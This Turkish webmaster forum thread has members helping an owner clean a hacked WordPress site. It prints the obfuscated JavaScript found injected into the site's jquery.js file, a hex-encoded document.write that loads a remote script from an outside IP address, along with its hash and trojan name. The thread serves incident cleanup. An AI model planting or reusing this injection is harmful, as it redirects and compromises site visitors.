• 25-02-2018, 17:03:34
    #1
    http://www.turktarihi.com/ web sitesinde saldırıya uğramış içerik tespit edildi
    Güvenliği ihlal edilmiş olduğunu belirlediğimiz sayfalara ait bir veya daha fazla URL örneği aşağıda belirtilmiştir. Bu saldırıya uğramış içeriğin göründüğü yerleri daha iyi anlamak için bu örnekleri inceleyin. Bu liste tam kapsamlı değildir.
    http://www.turktarihi.com/d57j/5l92a...ils-5-tutorial
    Merhaba arkadaşlar. Yukarıda belirttiğim problemin sebebi ve çözümü konusunda yardımcı olabilecek kimse var mıdır
  • 25-02-2018, 20:12:52
    #2
    Geçen bir yerde denk geldim sunucuda ki tüm sitelere atmışlar.
    FTP ana dizinde dosya ve klasör şeklinde bi kaç dosya var onları sil htaccess eklemeler var onlarıda düzenle tamamdır.
    Ama açığı bulmak lazım.Sunucuda diğer siteleride kontrol et yoksa sitende açık olabilir.
  • 25-02-2018, 23:42:11
    #3
    CoLLeR adlı üyeden alıntı: mesajı görüntüle
    Geçen bir yerde denk geldim sunucuda ki tüm sitelere atmışlar.
    FTP ana dizinde dosya ve klasör şeklinde bi kaç dosya var onları sil htaccess eklemeler var onlarıda düzenle tamamdır.
    Ama açığı bulmak lazım.Sunucuda diğer siteleride kontrol et yoksa sitende açık olabilir.
    Bahsettiğin gibi yabancı dosyaları sildim fakat .htaccess'de farklı kod göremedim. .htaccess dosyasını aynen kopyalayıp aşağıda paylaşıyorum ;
     # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
     
    # END WordPress
  • 25-02-2018, 23:47:33
    #4
    Merhaba,
    http://www.turktarihi.com/wp-include...uery/jquery.js şu dosyasını kontrol eder misin?
  • 25-02-2018, 23:52:53
    #5
    Üyeliği durduruldu
    AvrupaGelinlik adlı üyeden alıntı: mesajı görüntüle
    Bahsettiğin gibi yabancı dosyaları sildim fakat .htaccess'de farklı kod göremedim. .htaccess dosyasını aynen kopyalayıp aşağıda paylaşıyorum ;
    # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress
    var _0xc790=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x6 5","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x6 3\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\ x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x3 2\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\ x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C"," \x77\x72\x69\x74\x65"];document[_0xc790[5]](_0xc790[4][_0xc790[3]](_0xc790[0])[_0xc790[2]]()[_0xc790[1]](_0xc790[0])) kodlar burda.. bilginize bey efendi.

    wp-includes/js/jquery/jquery.js?ver=1.12.4

    buyrun wp content hariç config hariç silip geri yükleyin.

    SHA1 kodu : 5ac64870345a61f61ddeeff82cb2dca0e6487abe
    Trojen ismi : TrojWare.JS.Redirector.NKK
  • 26-02-2018, 00:24:17
    #6
    Mira.Net.TR adlı üyeden alıntı: mesajı görüntüle
    Merhaba,
    http://www.turktarihi.com/wp-include...uery/jquery.js şu dosyasını kontrol eder misin?
    Kontrol ettim fakat bunu nasıl temizleyebilirim
  • 26-02-2018, 00:29:24
    #7
    Lordbey adlı üyeden alıntı: mesajı görüntüle
    var _0xc790=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x6 5","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x6 3\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\ x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x3 2\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\ x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C"," \x77\x72\x69\x74\x65"];document[_0xc790[5]](_0xc790[4][_0xc790[3]](_0xc790[0])[_0xc790[2]]()[_0xc790[1]](_0xc790[0])) kodlar burda.. bilginize bey efendi.

    wp-includes/js/jquery/jquery.js?ver=1.12.4

    buyrun wp content hariç config hariç silip geri yükleyin.

    SHA1 kodu : 5ac64870345a61f61ddeeff82cb2dca0e6487abe
    Trojen ismi : TrojWare.JS.Redirector.NKK
    AvrupaGelinlik adlı üyeden alıntı: mesajı görüntüle
    Kontrol ettim fakat bunu nasıl temizleyebilirim
    Lordumun dediği gibi yapabilirsin en sağlıklısı olacaktır. Yine aynı durum olur ise sunucu sahibiyle bir görüşün kontrol etsin sağı solu